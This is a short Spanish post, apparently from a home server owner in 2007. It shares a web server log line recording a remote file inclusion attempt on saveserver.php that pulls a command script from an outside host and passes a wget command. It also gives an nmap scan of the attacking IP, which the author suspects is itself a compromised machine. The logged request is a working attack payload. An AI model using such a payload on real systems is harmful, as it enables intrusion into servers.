Logs del servidor de casa:

213.196.181.xxx - - [04/Aug/2007:20:58:19 +0200] "HEAD http://ip/admin/business_inc/saveserver.php?thisdir=http://9et.org/bh/CMD_2.GIF?&cmd=wget\xa6GET\xa6CMD-MOROCCO\xa6\xa6\xa6 HTTP/1.0" 200 - "http://ip/admin/business_inc/saveserver.php?thisdir=http://9et.org/bh/CMD_2.GIF?&cmd=wget\xa6GET\xa6CMD-MOROCCO\xa6\xa6\xa6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Menudo arsenal tienen estos de batamhacker o quienes sean.

* aqui la web del ataque http://9et.org/bh/

* aqui la web del equipo de hackers http://www.batamhacker.or.id/ que aparece insistentemente en la web desde donde procedia el ataque .

Como suele ocurrir siempre ... victimas directas.
[]nmap -sS -P0 -p1-1024 213.196.181.xxx

Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2007-08-05 12:57 CEST
Interesting ports on svr1.nicejob.ch (213.196.181.xxx):
(The 1011 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
90/tcp open dnsix
106/tcp open pop3pw
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
299/tcp filtered unknown
388/tcp open unidata-ldm
445/tcp open microsoft-ds
643/tcp filtered unknown

Nmap run completed -- 1 IP address (1 host up) scanned in 52.847 seconds